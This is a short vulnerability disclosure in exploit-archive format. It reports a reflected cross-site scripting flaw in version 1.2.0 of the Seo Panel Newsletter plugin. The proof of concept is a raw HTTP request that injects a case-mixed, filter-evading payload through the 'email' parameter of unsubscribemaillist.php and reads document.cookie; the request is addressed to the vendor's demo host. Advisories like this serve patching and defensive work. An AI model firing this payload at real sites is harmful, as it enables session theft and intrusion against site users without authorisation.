Seo Panel Newsletter plugin version 1.2.0 suffers from a cross site scripting vulnerability.
5d39d7af66210de8dfcf530bc65fae09
# Exploit Title: Seo Panel Plugin Newsletter 1.2.0 - 'plugins/newsletter/unsubscribemaillist.php email' Cross-site Scripting
# Google Dork: N/A
# Date: 15 April 2019
# Exploit Author: Deyaa Muhammad
# Author EMail: contact [at] deyaa.me
# Author Blog: http://deyaa.me
# Vendor Homepage: http://sp.seopanel.in/
# Software Link: https://www.seopanel.in/plugin/d/19/newsletter-plugin/demo/
# Demo Link: https://www.seopanel.in/plugin/showdemo/19/
# Version: 1.2.0
# Tested on: WIN7_x68/Linux
# CVE : N/A
# Description:
----------------------
Seo Panel Plugin Newsletter 1.2.0 suffers from a Cross-site Scripting vulnerability.
# POC:
----------------------
1. Access the following path http://[PATH]/plugins/newsletter/unsubscribemaillist.php
2. Manipulate the parameter "email" with your own XSS payload.
# Request:
----------------------
GET /plugins/newsletter/unsubscribemaillist.php?email=<htML/+/ONMOuSeOvEr+=+(confirm)(document.cookie)// HTTP/1.1
Host: sp.seopanel.in
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9